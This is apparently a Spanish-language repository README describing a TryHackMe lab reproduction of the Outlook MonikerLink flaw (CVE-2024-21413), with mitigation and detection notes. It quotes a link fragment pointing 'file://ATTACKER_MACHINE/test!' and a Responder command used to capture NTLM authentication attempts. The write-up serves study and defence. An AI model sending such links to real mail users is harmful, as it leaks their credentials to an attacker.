
Este repositorio contiene notas de investigación y una prueba de concepto (PoC) de alto nivel para CVE-2024-21413, una vulnerabilidad observada en ciertos clientes de correo al manejar enlaces de estilo SMB/moniker incrustados en mensajes. La PoC y los experimentos documentados aquí se realizaron en un entorno de laboratorio controlado en sistemas.
Este proyecto reproduce el comportamiento de MonikerLink (CVE-2024-21413) en un entorno TryHackMe completamente aislado para mostrar cómo ciertos formatos de hipervínculo pueden hacer que Outlook procese un enlace de manera que filtre intentos de autenticación o conduzca a una explotación posterior. El entregable es un PoC, y un conjunto priorizado de mitigaciones y sugerencias de detección que los equipos de seguridad pueden aplicar. No se atacaron sistemas en vivo o no autorizados.
| Herramienta / Habilidad | Propósito |
|---|---|
| Python | Desarrollo de scripts |
| Linux (Kali) | Sistema atacante |
| Metasploit | Explotación y acceso |
| Laboratorio TryHackMe | Entorno controlado |
Este código fue escrito por CMNatic y se puede encontrar aquí
Por ejemplo, en la siguiente línea “<a href=“file://ATTACKER_MACHINE/test!” reemplacé "ATTACKER_MACHINE" con la dirección IP de mi máquina atacante y en la línea “server = smtplib.SMTP('MAILSERVER', 25)”, cambié "MAILSERVER" por la dirección IP de mi máquina víctima.
responder -I ens5
systemctl start systemd-resolved

Esta prueba de concepto expone un matiz en el manejo de enlaces de Microsoft Outlook: ciertos enlaces de moniker estilo file:// que hacen referencia a recursos SMB pueden evadir el filtrado estándar de Outlook y provocar intentos de autenticación salientes. El comportamiento aquí demostrado fue reproducido en un laboratorio TryHackMe completamente controlado y resalta cómo formatos de enlace aparentemente benignos pueden ocultar interacciones de red. Aunque se han emitido parches del proveedor y guías de detección, los mecanismos subyacentes siguen siendo complejos debido a los usos legítimos del esquema moniker/archivo. Es importante destacar que la actividad generada por este PoC es observable a nivel de red (por ejemplo, en capturas de paquetes que muestran intentos de autenticación NTLM), lo que la hace adecuada para análisis forense e investigación de incidentes.
Una regla Yara ha sido creada por Florian Roth para detectar correos que contengan el elemento :file:\:.
